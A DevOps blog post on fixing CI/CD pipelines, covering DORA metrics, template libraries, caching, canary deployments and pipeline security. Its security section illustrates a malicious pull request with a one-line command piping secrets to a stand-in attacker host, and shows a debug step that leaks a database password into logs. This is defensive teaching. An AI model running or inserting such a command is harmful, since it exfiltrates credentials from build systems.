S, Sanjay

Posted on Mar 21

Your CI/CD Pipeline is a Dumpster Fire — Here's the Extinguisher 🧯

#devops #azure #cicd #github

🎬 Welcome to Pipeline Therapy

Let me describe your CI/CD pipeline. Stop me when I'm wrong:

It takes 42 minutes to build and deploy
Nobody knows exactly what it does (the YAML is 800 lines)
Each team has their own custom pipeline because "our needs are different"
Flaky tests fail 20% of the time, and everyone just re-runs the pipeline
There's a manual approval step where someone clicks "Approve" without looking
Someone set it up 3 years ago and that person doesn't work here anymore

Was I close? 😏

Let's fix all of this.

📊 DORA Metrics: How to Know If You're Actually Good

Before fixing anything, you need to measure where you stand. Google's DORA research (14,000+ teams studied) identified 4 key metrics that predict software delivery performance:

 Metric                    │ Elite          │ "We Need Help"
 ─────────────────────────┼────────────────┼──────────────────
 Deployment Frequency      │ Multiple/day   │ Monthly or less
 Lead Time for Changes     │ < 1 hour       │ > 1 month
 Change Failure Rate       │ 0-15%          │ > 45%
 Mean Time to Recovery     │ < 1 hour       │ > 6 months

Here's the Uncomfortable Truth

If your team deploys once a week, your lead time is 3 days, and your change failure rate is 30% — you are statistically average. Not bad, but not good either.

Elite teams deploy hundreds of times per day with less than 15% failure rate. They're not smarter — they have better pipelines, smaller changes, and more automation.

How to Track DORA Now

# GitHub Actions: Track deployment frequency
- name: Record deployment
  run: |
    curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \
      -H "Content-Type: application/json" \
      -d '{
        "event": "deployment",
        "service": "${{ github.repository }}",
        "environment": "production",
        "sha": "${{ github.sha }}",
        "timestamp": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'"
      }'

Or use tools like Sleuth, LinearB, or GitHub's built-in DORA metrics (available in GitHub Insights for Enterprise).

🏗️ Pipeline Architecture: The Template Library Pattern

The Anti-Pattern: Every Team Reinvents the Wheel

Team Alpha: 800-line custom YAML → Azure DevOps
Team Bravo: 600-line custom YAML → Azure DevOps (different structure)
Team Charlie: "We just deploy from our laptops" → 😱

Result:
  • 3 different security scanning approaches
  • 2 teams forgot to add container image scanning
  • 1 team has no tests in their pipeline
  • Nobody can help debug another team's pipeline

The Solution: Shared Template Library

┌──────────────────────────────────────────────────┐
│         Shared Template Library (v2.5.0)         │
│                                                  │
│  ┌───────────┐ ┌───────────┐ ┌───────────────┐  │
│  │  Build     │ │  Test     │ │  Security     │  │
│  │  Template  │ │  Template │ │  Scan         │  │
│  │  (.NET,    │ │  (unit,   │ │  Template     │  │
│  │   Node,    │ │  integ,   │ │  (Trivy,      │  │
│  │   Python)  │ │  e2e)     │ │   Checkov)    │  │
│  └───────────┘ └───────────┘ └───────────────┘  │
│  ┌───────────┐ ┌───────────┐ ┌───────────────┐  │
│  │  Deploy    │ │  Notify   │ │  Rollback     │  │
│  │  Template  │ │  Template │ │  Template     │  │
│  │  (K8s,     │ │  (Slack,  │ │  (auto/       │  │
│  │   AppSvc)  │ │   Teams)  │ │   manual)     │  │
│  └───────────┘ └───────────┘ └───────────────┘  │
└──────────────────────────────────────────────────┘
         │ consumed by
         ▼
┌─────────────────────────────────────────────────┐
│  Team pipelines (10-20 lines each!)             │
│  "Use build template, test template, deploy     │
│   template — just tell it your service name"    │
└─────────────────────────────────────────────────┘

Azure DevOps: Template Library in Action

# Team's pipeline: SHORT and STANDARD
trigger:
  branches:
    include: [main]

resources:
  repositories:
    - repository: templates
      type: git
      name: platform/pipeline-templates
      ref: refs/tags/v2.5.0    # 🔑 Always pin the version!

stages:
  - template: stages/ci.yml@templates
    parameters:
      language: dotnet
      dotnetVersion: '8.0'
      testProjects: '**/*Tests.csproj'

  - template: stages/security-scan.yml@templates
    parameters:
      trivySeverity: 'CRITICAL,HIGH'

  - template: stages/deploy-k8s.yml@templates
    parameters:
      environment: staging
      aksCluster: aks-staging-eastus
      namespace: payments

  - template: stages/deploy-k8s.yml@templates
    parameters:
      environment: production
      aksCluster: aks-prod-eastus
      namespace: payments
      requireApproval: true

GitHub Actions: Reusable Workflows

# .github/workflows/deploy.yml — Team's workflow
name: Deploy
on:
  push:
    branches: [main]

jobs:
  build-and-test:
    uses: myorg/shared-workflows/.github/workflows/build-dotnet.yml@v2.5.0
    with:
      dotnet-version: '8.0'
      project-path: 'src/PaymentService'

  security-scan:
    needs: build-and-test
    uses: myorg/shared-workflows/.github/workflows/security-scan.yml@v2.5.0
    with:
      image: ${{ needs.build-and-test.outputs.image }}

  deploy:
    needs: [build-and-test, security-scan]
    uses: myorg/shared-workflows/.github/workflows/deploy-k8s.yml@v2.5.0
    with:
      environment: production
      image: ${{ needs.build-and-test.outputs.image }}
    secrets: inherit

⚡ Pipeline Performance: From 45 Minutes to 5

Where's the Time Going?

In my experience auditing pipelines, here's where time hides:

Typical 45-minute pipeline breakdown:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  7 min  │██████│        Agent startup + checkout
 12 min  │████████████│  Dependency install (npm/nuget)
  5 min  │█████│         Build
  8 min  │████████│      Tests (running ALL tests sequentially)
  3 min  │███│           Docker build (no layer caching)
  5 min  │█████│         Security scanning
  5 min  │█████│         Deploy + smoke tests
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 45 min total  💤

Optimized 5-minute pipeline:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  0.5 min │█│            Cached checkout
  0.5 min │█│            Cached dependencies
  1 min   │██│           Incremental build
  1 min   │██│           Parallel tests (affected only)
  0.5 min │█│            Docker build (cached layers)
  1 min   │██│           Parallel: scan + deploy
  0.5 min │█│            Smoke test
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  5 min total  🚀

The Optimization Playbook

1. Cache Everything

# GitHub Actions: Cache node_modules
- uses: actions/cache@v4
  with:
    path: ~/.npm
    key: npm-${{ hashFiles('**/package-lock.json') }}
    restore-keys: npm-

# Azure DevOps: Cache NuGet packages
- task: Cache@2
  inputs:
    key: 'nuget | "$(Agent.OS)" | **/packages.lock.json'
    restoreKeys: 'nuget | "$(Agent.OS)"'
    path: $(NUGET_PACKAGES)

2. Docker Layer Caching

# BAD: Copying everything first breaks the cache
COPY . .
RUN npm install

# GOOD: Copy package files first, install, THEN copy code
COPY package.json package-lock.json ./
RUN npm ci --production
COPY . .
# Now code changes don't re-trigger npm install

3. Run Tests in Parallel

# GitHub Actions: Matrix strategy
jobs:
  test:
    strategy:
      matrix:
        shard: [1, 2, 3, 4]
    steps:
      - run: npm test -- --shard=${{ matrix.shard }}/4

4. Only Test What Changed

# For monorepos: detect which service changed
- uses: dorny/paths-filter@v3
  id: changes
  with:
    filters: |
      payments:
        - 'services/payments/**'
      users:
        - 'services/users/**'

- name: Test payments
  if: steps.changes.outputs.payments == 'true'
  run: cd services/payments && npm test

🚨 Real-World Disaster #1: The Self-Hosted Runner That Poisoned Everything

The Error:

ERROR: npm ERR! ENOSPC: no space left on device

What Happened: Self-hosted build agents accumulated Docker images, node_modules caches, and build artifacts over months. Disk filled up. Builds started failing randomly across all teams.

Worse: One build left behind a corrupted node_modules folder. The next build on the same agent used the cached corruption and deployed a broken application.

The Fix:

Use ephemeral agents (fresh VM/container per build) — Azure DevOps Scale Set agents or GitHub Actions hosted runners
If self-hosted, add a cleanup job:

- name: Agent cleanup
  condition: always()
  run: |
    docker system prune -af --volumes
    rm -rf /tmp/build-*

🚢 Deployment Strategies: How to Ship Without Sinking

The Deployment Strategy Menu

Strategy           │ Risk  │ Speed │ Rollback │ Best For
───────────────────┼───────┼───────┼──────────┼──────────────────
Rolling Update     │ Med   │ Fast  │ Slow     │ Default K8s strategy
Blue-Green         │ Low   │ Fast  │ Instant  │ Stateless services
Canary             │ Low   │ Slow  │ Fast     │ High-risk changes
Feature Flags      │ Lowest│ Inst. │ Instant  │ Business logic changes

Canary Deployment: The Smart Way to Ship

Step 1: Deploy new version to 5% of traffic
  ┌─────────────────────────────────┐
  │  95% traffic → v1.0 (3 pods)   │
  │   5% traffic → v2.0 (1 pod)    │   ← Watch error rates, latency
  └─────────────────────────────────┘

Step 2: If metrics look good, increase to 25%
  ┌─────────────────────────────────┐
  │  75% traffic → v1.0 (3 pods)   │
  │  25% traffic → v2.0 (1 pod)    │   ← Still watching...
  └─────────────────────────────────┘

Step 3: If still good, go to 100%
  ┌─────────────────────────────────┐
  │ 100% traffic → v2.0 (3 pods)   │   ← 🎉 Full rollout
  └─────────────────────────────────┘

Step ABORT: If any stage looks bad
  ┌─────────────────────────────────┐
  │ 100% traffic → v1.0 (3 pods)   │   ← 😌 Safely rolled back
  │   0% traffic → v2.0 (removed)  │
  └─────────────────────────────────┘

🚨 Real-World Disaster #2: The Friday 5 PM Deployment

What Happened: Team deploys at 5:07 PM on Friday (bad idea, but deadlines). Rolling update replaces all 3 pods. New version has a memory leak that manifests after 4 hours. At 9 PM, pods start OOMKilling. Nobody's monitoring. By Saturday morning, the payment service has been down for 12 hours.

If they had used canary: The 5% canary pod would have shown increasing memory usage within 2 hours. Automated rollback triggers at 7 PM. 95% of users never noticed. Team enjoys their weekend.

The Golden Rules:

Never deploy on Friday (unless you have canary + automated rollback)
Never deploy during peak hours (find your low-traffic window)
Always have automated rollback based on error rates and latency
Small changes, frequent deploys > big changes, occasional deploys

🔐 Pipeline Security: Your Pipeline is an Attack Vector

Your CI/CD pipeline has more access than most developers:

It can push code to production
It has access to secrets and credentials
It can modify infrastructure
It downloads code from the internet (dependencies)

Things That Should Scare You

Scary Thing #1: Secrets in pipeline logs
  ┌─────────────────────────────────────────────┐
  │ Step: Deploy                                │
  │ $ echo $DATABASE_CONNECTION_STRING           │
  │ Server=prod.db.windows.net;Password=Pa$$w0rd│  ← 🫠
  └─────────────────────────────────────────────┘

Scary Thing #2: Pull request pipelines run arbitrary code
  ┌─────────────────────────────────────────────┐
  │ External contributor opens PR                │
  │ PR changes build script to:                 │
  │   echo $SECRETS | curl attacker.com         │
  │ Pipeline runs automatically...              │  ← 😱
  └─────────────────────────────────────────────┘

Scary Thing #3: Dependency confusion attacks
  ┌─────────────────────────────────────────────┐
  │ Internal package: @mycompany/utils          │
  │ Attacker publishes: @mycompany/utils on npm │
  │ Pipeline installs public one first...       │  ← 🦠
  └─────────────────────────────────────────────┘

Pipeline Security Checklist

Authentication:
  ✅ OIDC federation (no long-lived secrets in pipelines)
  ✅ Managed Identity for Azure resources
  ✅ Short-lived tokens (expire in minutes, not months)

Authorization:
  ✅ Pipeline can only deploy to its own service
  ✅ Production deploys require approved PR + passing checks
  ✅ Environment protection rules with required reviewers

Dependencies:
  ✅ Lock files committed (package-lock.json, go.sum)
  ✅ Dependency scanning (Dependabot, Snyk)
  ✅ Private package registry for internal packages

Secrets:
  ✅ Never echo/print secrets in logs
  ✅ Use secret masking in pipeline variables
  ✅ Rotate secrets automatically
  ✅ Audit who accesses what secret

🚨 Real-World Disaster #3: The Secret That Wasn't Secret

What Happened: A developer added a debug step to a pipeline:

- name: Debug connection
  run: |
    echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}"

GitHub/Azure DevOps masks secrets in logs... usually. But this string was partially masked because it contained special characters that broke the masking regex. The full production database password appeared in the build log. The build log was accessible to 200 developers.